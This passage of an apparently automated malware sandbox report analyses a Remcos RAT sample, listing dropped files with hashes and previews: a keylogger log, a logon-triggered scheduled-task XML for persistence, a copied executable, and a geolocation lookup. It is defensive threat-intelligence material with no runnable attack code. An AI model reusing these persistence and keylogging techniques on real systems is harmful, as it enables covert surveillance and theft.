                                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                            • 138.7.41.100
                                                            nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                            • 138.44.114.198
                                                            nabarm.elfGet hashmaliciousUnknownBrowse
                                                            • 143.92.28.30
                                                            nklarm5.elfGet hashmaliciousUnknownBrowse
                                                            • 103.162.242.172
                                                            nabarm7.elfGet hashmaliciousUnknownBrowse
                                                            • 103.161.64.95

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\ProgramData\dfgh\logs.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):144
                                                            Entropy (8bit):3.379519383183141
                                                            Encrypted:false
                                                            SSDEEP:3:rhlKlM+Xl9NxlfPfcl5JWRal2Jl+7R0DAlBG45klovDl6v:6ljRq5YcIeeDAlOWAv
                                                            MD5:8637749F7EC9498D701D040942E6AB32
                                                            SHA1:CF2BB65DC1D8CB528245D2DEA6C59E809A8C9F8F
                                                            SHA-256:91864D43A4E7F7C82857508994E9E4E86E01F81870DFF526CFE3AD1B5FA57E07
                                                            SHA-512:8FB0FCD7F94F87CD472F283CCEBE391061BC7D1CC723F378A5243FD95A22F15FF3AF028318C14842D05E26268D8499B77FC655F39F6C321071737203A5F6A2D5
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\dfgh\logs.dat, Author: Joe Security
                                                            Preview:....[.2.0.2.4./.1.0./.2.8. .1.3.:.3.7.:.0.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mXJeXQoaGktJCW.exe.log

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):956
                                                            Entropy (8bit):5.015722524181511
                                                            Encrypted:false
                                                            SSDEEP:12:tkTLJwnd6UGkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkwV:qpQdVauKyGX85MEBZvXhNlT3/7l1DYro
                                                            MD5:EEBE2D07DE1EC6311E7B13935B66B5B7
                                                            SHA1:204ECF3E467DB47E44B9010C15932ECDFF5A476D
                                                            SHA-256:9E64D02D8AC9BE1B2CDB358136883E94CD474EEDD8DC653BA6ABA08C499BBBC0
                                                            SHA-512:0EAFA8AA4E5D5D874010A09DB1E77C302E67C532A64D8432BF4CDC52E7A292A9D12223F7CDD67C25F7B17B9310E832D258C8BC14F72334C160E93460B20ED113
                                                            Malicious:false
                                                            Preview:{. "geoplugin_request":"155.94.241.188",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.380747059108785
                                                            Encrypted:false
                                                            SSDEEP:48:lylWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMuge//YPUyus:lGLHxcIalLgZ2KRHWLOugQs
                                                            MD5:48658F2302B2A2AA9F22D4D58B65B588
                                                            SHA1:C90440D87BAB490012345D0BDFA32C3EFCB1D210
                                                            SHA-256:1D3997D787FA4BEA3B78EB28B01623D55088D6412BE6D420D8D78355505AC7E9
                                                            SHA-512:659C5D45FD2706FB42F05523E670157570F2B1AB008E9222ED7A20CB902F77C00515BA601C0326918445C438FFA66B5888747B034BBC299867C6E019093235D7
                                                            Malicious:false
                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2a1hhp54.sf2.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azvyylrv.eyr.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2fxaizp.45n.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvlrsq3f.uly.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kibquxbx.i4p.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktmibnjj.y2n.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vq30imnz.bzc.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygqdi1e1.mt0.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\bhv4754.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):15728640
                                                            Entropy (8bit):0.10106922760070924
                                                            Encrypted:false
                                                            SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                            MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                            SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                            SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                            SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                            Malicious:false
                                                            Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp8E60.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1587
                                                            Entropy (8bit):5.117969096645718
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtfxvn:cgergYrFdOFzOzN33ODOiDdKrsuTZv
                                                            MD5:D6882041330F6ECDD1F5931F2344851B
                                                            SHA1:9CAAA2CC2634F024F40AE7E9219C019E5090DE99
                                                            SHA-256:E6692D91DD0C10211596C56D85713669EF88B4A51DEE93799C250C5B525AC663
                                                            SHA-512:5E1FE55252CA0D16698776A7BF2A9F10FF29D925B318C41A9D9E925D7350FDF06141E0C9829F4AC31F6A1C253EDCA4C1926579BCEB8D29C22B9FDF63DC1661E3
                                                            Malicious:true
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                            C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1587
                                                            Entropy (8bit):5.117969096645718
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtfxvn:cgergYrFdOFzOzN33ODOiDdKrsuTZv
                                                            MD5:D6882041330F6ECDD1F5931F2344851B
                                                            SHA1:9CAAA2CC2634F024F40AE7E9219C019E5090DE99
                                                            SHA-256:E6692D91DD0C10211596C56D85713669EF88B4A51DEE93799C250C5B525AC663
                                                            SHA-512:5E1FE55252CA0D16698776A7BF2A9F10FF29D925B318C41A9D9E925D7350FDF06141E0C9829F4AC31F6A1C253EDCA4C1926579BCEB8D29C22B9FDF63DC1661E3
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                            C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2
                                                            Entropy (8bit):1.0
                                                            Encrypted:false
                                                            SSDEEP:3:Qn:Qn
                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                            Malicious:false
                                                            Preview:..

                                                            C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1144840
                                                            Entropy (8bit):7.728131003608779
                                                            Encrypted:false
                                                            SSDEEP:24576:n2oNUrTTPrtbxvKQt0Zs1bKW2sFTkYFltyi8sxg5SSnvmMKBHJ/G8eZuhnYx:2oN+Tztbt6s1bV1FT5FjTbx4bnvFKjeX
                                                            MD5:03A6863E7931768C020F1A98531E5212
                                                            SHA1:7FBF21510BA0927B16F9DE491E6DACE95A35C228
                                                            SHA-256:96E41C2D613926361AFEBFC693537919269AE11F3FF721EB4F60BF823258E154
                                                            SHA-512:1C38FA9DC160A2B629A875EEDF406AF168F38380AC53824DD1203C74C1426417C104583858349FC5940F104A1233C33EE8B31A1E9C72F922912B72F55E842980
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0......L........... ... ....@.. ....................................@.....................................O.... ..dI...........B...6........................................................... ............... ..H............text........ ...................... ..`.rsrc...dI... ...J..................@..@.reloc...............@..............@..B........................H.......xk..t.............................................................(....*r.(......}......}......}....*..(......}......}......}.......}....*...0..O........(.....(.....{....o......../.........%.r...p.%.r...p.%.r!..p.o....&.sk...}....*j.(.....(......}.....(....*.*..{....s(...%o.....(....o.....(....*.0..P........{....{....r?..p(....,..{....rE..po....*.{....{....rO..p(....,..{....rU..po....*z.,..{....,..{....o......(....*..0.............a..`o ......(!....a("...*..(....,*...

                                                            C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.728131003608779
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File size:1'144'840 bytes
                                                            MD5:03a6863e7931768c020f1a98531e5212
                                                            SHA1:7fbf21510ba0927b16f9de491e6dace95a35c228
                                                            SHA256:96e41c2d613926361afebfc693537919269ae11f3ff721eb4f60bf823258e154
                                                            SHA512:1c38fa9dc160a2b629a875eedf406af168f38380ac53824dd1203c74c1426417c104583858349fc5940f104a1233c33ee8b31a1e9c72f922912b72f55e842980
                                                            SSDEEP:24576:n2oNUrTTPrtbxvKQt0Zs1bKW2sFTkYFltyi8sxg5SSnvmMKBHJ/G8eZuhnYx:2oN+Tztbt6s1bV1FT5FjTbx4bnvFKjeX
                                                            TLSH:EB35BDC03A253B27DEB895F0E155ED714BB529697018F6E61CDA3BD731E8B209A08F43
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0......L........... ... ....@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:0082c20149000000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x5112e6
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x671FAAB3 [Mon Oct 28 15:16:03 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                            Subject Chain
